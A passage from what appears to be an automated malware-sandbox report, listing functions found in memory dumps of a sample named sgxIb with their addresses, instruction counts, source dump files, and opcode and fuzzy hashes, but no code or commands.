                                • Opcode Fuzzy Hash: 7026e3903a508975bec6674ae61e4e11737ca7cd7448a229c61dd7e0b446fb99
                                • Instruction Fuzzy Hash: F8913A30E106198BDF64DF68C890B9DBBB1FF89310F20C599D549BB285DB70AA85CF91
                                Function 06CC46E8 Relevance: .2, Instructions: 210COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cfb22f14050cb656f85955539eacd225d0059f52fc39676862db8a3f2b3bb550
                                • Instruction ID: 328e786597d86650461008cba2da2fbdd46b86497694dd0cc226f65e9515f22d
                                • Opcode Fuzzy Hash: cfb22f14050cb656f85955539eacd225d0059f52fc39676862db8a3f2b3bb550
                                • Instruction Fuzzy Hash: 7C912A34E106198BDF64DF68C890B9DB7B1FF89310F20C699D549BB285DB70AA85CF90
                                Function 06CCF048 Relevance: .2, Instructions: 201COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 36657f5487bbb67b44ab18fc95a2070b617a6270919a01ea9ab3ec9ec289aa30
                                • Instruction ID: 2e2b3992b6b2d1bf74250f45d5b6ab04f55f637d9aa731e51dd93c7e51d8bfe1
                                • Opcode Fuzzy Hash: 36657f5487bbb67b44ab18fc95a2070b617a6270919a01ea9ab3ec9ec289aa30
                                • Instruction Fuzzy Hash: 9D714570A002499FDB54DFA9D990AAEBBF6FF88310F24842DD419AB354DB34ED46CB50
                                Function 06CCF047 Relevance: .2, Instructions: 199COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ead7687c07da9e4d775a02bd30b85fe26099c44b21f5b4c4e7b74dcbf0eb8d3b
                                • Instruction ID: d5ac58476671703698f6282b1950f04f90950ff2ec825dfb480f059351780ee5
                                • Opcode Fuzzy Hash: ead7687c07da9e4d775a02bd30b85fe26099c44b21f5b4c4e7b74dcbf0eb8d3b
                                • Instruction Fuzzy Hash: 71715670A002499FDB54DFA8D990AAEBBF6FF88310F24842DD419AB354DB30ED46CB50
                                Function 06CC4C80 Relevance: .2, Instructions: 186COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0e3b77adf9b2819827fc6e3f109597c66ed2ccad237228cb24e3ff0dba1ac870
                                • Instruction ID: d1dcbfacbbb4d5e3079416fc6e28b2cfa210ec2bb5f77304b39e444ff977f502
                                • Opcode Fuzzy Hash: 0e3b77adf9b2819827fc6e3f109597c66ed2ccad237228cb24e3ff0dba1ac870
                                • Instruction Fuzzy Hash: D2616C70F002189FEB54DBA9C8547AEBBF6FF88750F20842ED506AB391DB759C458B90
                                Function 06CCFA78 Relevance: .2, Instructions: 173COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fd77374c161e2873769b2f175ec4d766fb64a08a005c4e3916f346e3def9b42e
                                • Instruction ID: 2bb374303e2e5a5dfbf8aafbc3c3b389b044eb8241b59d9340b4496f05095ee4
                                • Opcode Fuzzy Hash: fd77374c161e2873769b2f175ec4d766fb64a08a005c4e3916f346e3def9b42e
                                • Instruction Fuzzy Hash: 6C5195B4B102144BEFA4AB78D96476F266BEBC9360F10443DE41BD7390CA7CCD4143A1
                                Function 06CC925A Relevance: .2, Instructions: 172COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6b923413891f18d9d0cb3e8053a2aa5ef433249c38b0dcf31a3e5c4d1306cbd9
                                • Instruction ID: 5bd659013d0724b90922009eba8ec4909aec60f8d742f95aaf556cea24e6e90e
                                • Opcode Fuzzy Hash: 6b923413891f18d9d0cb3e8053a2aa5ef433249c38b0dcf31a3e5c4d1306cbd9
                                • Instruction Fuzzy Hash: BA514170F105199FDB54DF68D8A0BAE7BF6FB88310F508569D509EB744EB38AC018BA0
                                Function 06CCFCD7 Relevance: .2, Instructions: 172COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4faef1292e8e080ab10fa1446210899337bd4cc8c2db93965301f2b8e3d127a6
                                • Instruction ID: 508ec2d0925dabe9f5453561288b05ef1dcc626b1dfa1bbe5f2c7bef8b3e1a8c
                                • Opcode Fuzzy Hash: 4faef1292e8e080ab10fa1446210899337bd4cc8c2db93965301f2b8e3d127a6
                                • Instruction Fuzzy Hash: 3951DF31E002149FDB64AFB8E4546ADBBB3FF89321F10887DE126D7251DB358955CB90
                                Function 06CC56B0 Relevance: .2, Instructions: 166COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a5a0921f405c3039be9bb8b2570141e7007b79d5be0199fd1f7d7ef95234ac89
                                • Instruction ID: 08e6561169a19aeb0838e31bd74f90ad1f674016f1a31510ab91a7519623b0b3
                                • Opcode Fuzzy Hash: a5a0921f405c3039be9bb8b2570141e7007b79d5be0199fd1f7d7ef95234ac89
                                • Instruction Fuzzy Hash: 7651A734E202058FDF708B69C4C077EBBB2EB45320FA4886ED55ADB281C635E991DB91
                                Function 06CCFA88 Relevance: .2, Instructions: 163COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0e955cc4c5120e8a6726553b299186837fbf9a1b25be7c6fcd02d859ec7713a2
                                • Instruction ID: d25beba6d43181685e95a83832e626709ddd25dff8ffd3a4ad13f0a27e717627
                                • Opcode Fuzzy Hash: 0e955cc4c5120e8a6726553b299186837fbf9a1b25be7c6fcd02d859ec7713a2
                                • Instruction Fuzzy Hash: 045163B4B102158BEFA4ABB8D96476F666BEBC9360F20443DE51BD7390CA7CCD4143A1
                                Function 06CCC908 Relevance: .2, Instructions: 160COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f8eb53010c06231a0c82080ec2f02e2af8d9bb6eac4ed0d4617f909a0213e58a
                                • Instruction ID: 5022b6ce8523c502af2d1e47da1d1e75ef85bc79d508e1d6f222f56d1ed64c74
                                • Opcode Fuzzy Hash: f8eb53010c06231a0c82080ec2f02e2af8d9bb6eac4ed0d4617f909a0213e58a
                                • Instruction Fuzzy Hash: A6515F74B002198FDB55EFB5D990A9EB7B2FBC8310B208579D405AB354DB75EC42CB90
                                Function 06CC4C71 Relevance: .1, Instructions: 144COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80404529e10089475f154bf40a7678bf5e3c5bca3c78c4f849dda0b3a6510175
                                • Instruction ID: 2f20c94a5d4f9a8b9b4dafb57e63673637fd93a40ad52aa7475244f8881825f0
                                • Opcode Fuzzy Hash: 80404529e10089475f154bf40a7678bf5e3c5bca3c78c4f849dda0b3a6510175
                                • Instruction Fuzzy Hash: E5517070F002189FDB54DBA9C8547AEBBF6EF88700F20C52DD506AB395DA759C058B90
                                Function 06CCDBE5 Relevance: .1, Instructions: 124COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 06e52f89fcc916eabed709c8d02f87f338ea33ee46c6dc26e16cd230b2ddad1c
                                • Instruction ID: 6ec1d422f5dbc5498d506eff67ca134c576f599aa50d37be408bd31f1db21cab
                                • Opcode Fuzzy Hash: 06e52f89fcc916eabed709c8d02f87f338ea33ee46c6dc26e16cd230b2ddad1c
                                • Instruction Fuzzy Hash: 91419F70E0020A9FDB60DFA5D89469EBBB2FF85750F20453DD412E7240EB74E946CB91
                                Function 06CC5529 Relevance: .1, Instructions: 123COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6143cf37febe12231867dba03d30606041353e8ba75fc0bf8aa691849f2b8581
                                • Instruction ID: 4ccacd0cf97043828193e3c6cc2685c93413f4bd2da8d514ece5a429c8b7d330
                                • Opcode Fuzzy Hash: 6143cf37febe12231867dba03d30606041353e8ba75fc0bf8aa691849f2b8581
                                • Instruction Fuzzy Hash: 75417F71E006098FDF60CF99D880AAEFBB2EB45220F50492ED156D7650D331F969CB91
                                Function 06CC21D0 Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c40abb4561ee8137e5007ea366c6b30229b7bfab0570c96f5e46fffa57427dc3
                                • Instruction ID: 097816ff87e42a108c49b24b66388e16722f6e0d4ac2d2204a7f9b66b8f51832
                                • Opcode Fuzzy Hash: c40abb4561ee8137e5007ea366c6b30229b7bfab0570c96f5e46fffa57427dc3
                                • Instruction Fuzzy Hash: 6C31CF30B102059FDB649B78D46866E7BA2BF89760F14452CD402EB395EF39DE01C7A1
                                Function 06CC2080 Relevance: .1, Instructions: 101COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 14334c35379530728862b2f81546c6b13b746bf0b68c035dafead7e8fe78a4f5
                                • Instruction ID: b64a512e7e2c2080084602cbff23734383a9e0828dd2db1127368af55ebf8fc7
                                • Opcode Fuzzy Hash: 14334c35379530728862b2f81546c6b13b746bf0b68c035dafead7e8fe78a4f5
                                • Instruction Fuzzy Hash: B5318E30E006959BCB55DF68D854A9EBBB2FF89310F10852EE906EB350DB35EE42CB50
                                Function 06CCDA98 Relevance: .1, Instructions: 98COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b57b872b56f7c87f003a3cfaf7193e1d9eaa49a4c37dc185bbdca9bac2b2b58c
                                • Instruction ID: 1eb187345090de600a2095a6208df753a50e9c0cd0d91489a3f4de7370ac9c46
                                • Opcode Fuzzy Hash: b57b872b56f7c87f003a3cfaf7193e1d9eaa49a4c37dc185bbdca9bac2b2b58c
                                • Instruction Fuzzy Hash: 3E316F70E1071A9BDB24DF69D99069EB7B2FF85310F20493DE406EB344EB71A946CB81
                                Function 06CC2090 Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d21a52e6693d26133880e1549a94d4131f9d8ed1197c2699d2a09a8b0b98cfd2
                                • Instruction ID: c7f1a7300a44dd4cf11986b1e4134b19bf543a00ddbad2700b3214d1eaef7936
                                • Opcode Fuzzy Hash: d21a52e6693d26133880e1549a94d4131f9d8ed1197c2699d2a09a8b0b98cfd2
                                • Instruction Fuzzy Hash: C5316D30E006599BCB55CF68D85469EB7B2FF89310F10852DE906EB350DB75EE42CB50
                                Function 06CC3FC1 Relevance: .1, Instructions: 82COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 730a780d9b51d8b49442e05f24cf35696a2211f95be4105b992fa1ba51037844
                                • Instruction ID: 8cb1f0e1c39b4ff824c6e675e2e4ca910ebea1ca5a76712cef5fdb26a877df83
                                • Opcode Fuzzy Hash: 730a780d9b51d8b49442e05f24cf35696a2211f95be4105b992fa1ba51037844
                                • Instruction Fuzzy Hash: 93216875F412149FDB10DF6DD980AAEBBF5EB48720F148029EA04E7340EB39ED018B91
                                Function 06CC3FD0 Relevance: .1, Instructions: 78COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fe52615ae1bdc5ecd74b6664651d1e921bc62c08de2afb8cde6ac408d401ab0c
                                • Instruction ID: 2ea6e5714d7549748af2c7d324545070819a93e0f833525c7bf42d68238240e0
                                • Opcode Fuzzy Hash: fe52615ae1bdc5ecd74b6664651d1e921bc62c08de2afb8cde6ac408d401ab0c
                                • Instruction Fuzzy Hash: 83217775E012549FDB50CF6DD980AAEBBF5EB48720F14802AEA04E7340EB39ED00CB90
                                Function 06CCA420 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 576c9c41e3a3eca5a3b4e4a0e4e1d09e879fa980a5b35569a909385addeb6225
                                • Instruction ID: 70e6cc820577203e9924997c300cc0c764f7ab1c10b4909b65d61d0821d70aba
                                • Opcode Fuzzy Hash: 576c9c41e3a3eca5a3b4e4a0e4e1d09e879fa980a5b35569a909385addeb6225
                                • Instruction Fuzzy Hash: 38110431F101185FDB60CABCE888BAE77E5EB85320F00453DE60AD7751DE29DE028391
                                Function 06CCB038 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1ed18ab48494f84bed26ac4f9124f33926b5d5817cbd093dae02aebddb2bb01f
                                • Instruction ID: 27a5fc145973804985d4b4f5be5d76d8426bf9e020f799a8e18f2e2e2dce1cd5
                                • Opcode Fuzzy Hash: 1ed18ab48494f84bed26ac4f9124f33926b5d5817cbd093dae02aebddb2bb01f
                                • Instruction Fuzzy Hash: 0E217C71D107598BDF64CFE9C85169EBBB6FF85350F14492ED805EB200EB70A985CB81
                                Function 012CD1F8 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3855162082.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12cd000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5a4f2e5852dea9a5baa5a87f46c66f4ae04bb796500337b9cea870592430e87a
                                • Instruction ID: 74b9d025be90fb4091041d509068004a5db4f7443946ad0cd87eb6664926d18c
                                • Opcode Fuzzy Hash: 5a4f2e5852dea9a5baa5a87f46c66f4ae04bb796500337b9cea870592430e87a
                                • Instruction Fuzzy Hash: AD210471514248DFEB11DF94D9C0B2ABB66FB84724F24C67DEA090B247C376D846CAE2
                                Function 012CD3A8 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3855162082.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12cd000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7e9b0eb2e1e132898d69db78c9ba775a87fb1c1be3b5fa23471eb600d9cdcc95
                                • Instruction ID: 42f2b1923de92354168b0a8b4547a5dfd8b1d0cd5e9ef1acabd15a4fdf5bc71f
                                • Opcode Fuzzy Hash: 7e9b0eb2e1e132898d69db78c9ba775a87fb1c1be3b5fa23471eb600d9cdcc95
                                • Instruction Fuzzy Hash: 272133B1510248DFDB10DF94D4C0B26FB65EB84714F20C6BDDB094B282C376E846CAA2
                                Function 012CD030 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3855162082.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12cd000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8b31b8bb95ee8c4a88273b83ff775f546e71981db299f0f4cb01ba541fe3c2db
                                • Instruction ID: 99516248e23e45e726b0092455138ece51546ad17656b07cb1adbc595892a6a7
                                • Opcode Fuzzy Hash: 8b31b8bb95ee8c4a88273b83ff775f546e71981db299f0f4cb01ba541fe3c2db
                                • Instruction Fuzzy Hash: E1210371514248DFDB11DF58D9C0B26BB65EB84714F24C67DDA094A282C376D446CAA2
                                Function 06CC3508 Relevance: .1, Instructions: 71COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8d3b97f3cd0bca83aade94825479c2f702812b5251ee0e8de56a05c8eae81ddb
                                • Instruction ID: a01aa30395e81765370393cd7dd0d2dfeab62ff76b3c91540d7e3c68e78d5f3f
                                • Opcode Fuzzy Hash: 8d3b97f3cd0bca83aade94825479c2f702812b5251ee0e8de56a05c8eae81ddb
                                • Instruction Fuzzy Hash: D421E170A043945FDB559B789C501DEFFB5EF8A320F0484ABD04AEB281DA309E44CBE2
                                Function 06CC40E0 Relevance: .1, Instructions: 59COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d97c52e35aeb46ac71df9e8775ce0454daba971308599ec07dbe4a722c56fec3
                                • Instruction ID: 9a9945209ca5a13bcd49a6ec2940c0656bde3310610b2444c49a1b27a036411c
                                • Opcode Fuzzy Hash: d97c52e35aeb46ac71df9e8775ce0454daba971308599ec07dbe4a722c56fec3
                                • Instruction Fuzzy Hash: 58113C36B105284BDB58DA7CD8246AE77FAEBC8761B00C539D50AE7340EA65DC1287A1
                                Function 06CCF2B8 Relevance: .1, Instructions: 58COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0f96039aee8923847e4b1074b947ae78687231d217fbbe7439ff7b98a923ab04
                                • Instruction ID: bb0c1b6ff1be5d396a1765b4bbf25fe5b5ea135f4ed8db966057b8432914006a
                                • Opcode Fuzzy Hash: 0f96039aee8923847e4b1074b947ae78687231d217fbbe7439ff7b98a923ab04
                                • Instruction Fuzzy Hash: FE01F534B041501FDB718B7CD464B6F7BE6DFC9224B14842EE509CB341DA25DD028391
                                Function 06CC3D99 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d90fdcbd4de17f395f93d099ed196e278648d79da93ccf2b4d6f3e1c78492c7
                                • Instruction ID: fb894dab3f926b971eed69b89ff6cf64c11cd3a40055cc91dd1b28c23cb19b58
                                • Opcode Fuzzy Hash: 7d90fdcbd4de17f395f93d099ed196e278648d79da93ccf2b4d6f3e1c78492c7
                                • Instruction Fuzzy Hash: 0C21E3B5D01259AFDB10CFAAD884ADEFBB4FB49210F10812AE918A7300D375A954CBE5
                                Function 012CD02B Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3855162082.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12cd000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction ID: 260593614d6264c6ded2ba67aed154f303fa42251dd91cb94412d578ef2bce5b
                                • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction Fuzzy Hash: B411BB75504284CFCB12CF58D5C0B15BBA1FB84714F28C6AEDA494B697C33BD44ACBA2
                                Function 012CD1F3 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3855162082.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12cd000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d692a0047d57c856fe9c281bc03ca2a8a9bd8913fa11d24a2e87d76695bbbe94
                                • Instruction ID: e545303090e35259072e1577c480db2df85410b80c91ada64924ba657f362da1
                                • Opcode Fuzzy Hash: d692a0047d57c856fe9c281bc03ca2a8a9bd8913fa11d24a2e87d76695bbbe94
                                • Instruction Fuzzy Hash: EC11DD76504284CFDB12CF54D5C4B15BB62FB84724F28C6AEDA490B647C33AD40ACBA2
                                Function 012CD3A3 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3855162082.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_12cd000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction ID: 2fb332a78dfd9ef1c29f72de9f4ec9399231e1434bdb3de5717388d4cbac96dc
                                • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction Fuzzy Hash: 6F11EE75504284CFCB12CF54C5C0B55FBA1FB84314F24C6AEDA094B292C33AE44ACB92
                                Function 06CC4327 Relevance: .1, Instructions: 52COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 42a6802c0a0a58fa45ce0ad00bef63544ac02a711f49dea94ffdc9abd43babbd
                                • Instruction ID: 9c972cfeae7f6aa5ece983020462f554045feaafecea0d53d260b2666ac0ff1c
                                • Opcode Fuzzy Hash: 42a6802c0a0a58fa45ce0ad00bef63544ac02a711f49dea94ffdc9abd43babbd
                                • Instruction Fuzzy Hash: 5E016D35B100241BDB6895BD9564B2FB3DBDBCA720F18C43EE60EC7344D965DD4247A1
                                Function 06CC3DA0 Relevance: .1, Instructions: 52COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 724c510efe8a872ec9f028d1f90aefa431ed15d625deb7c206a3572b0c92613f
                                • Instruction ID: bd5a079f950dc206e68f210852c22530c51a9db6a0d1810a7c74ffea547c470f
                                • Opcode Fuzzy Hash: 724c510efe8a872ec9f028d1f90aefa431ed15d625deb7c206a3572b0c92613f
                                • Instruction Fuzzy Hash: BB11D0B5D01259AFCB00DF9AD884ADEFBB4FB49320F10812AE918B7340C375A954CFA5
                                Function 06CC4328 Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
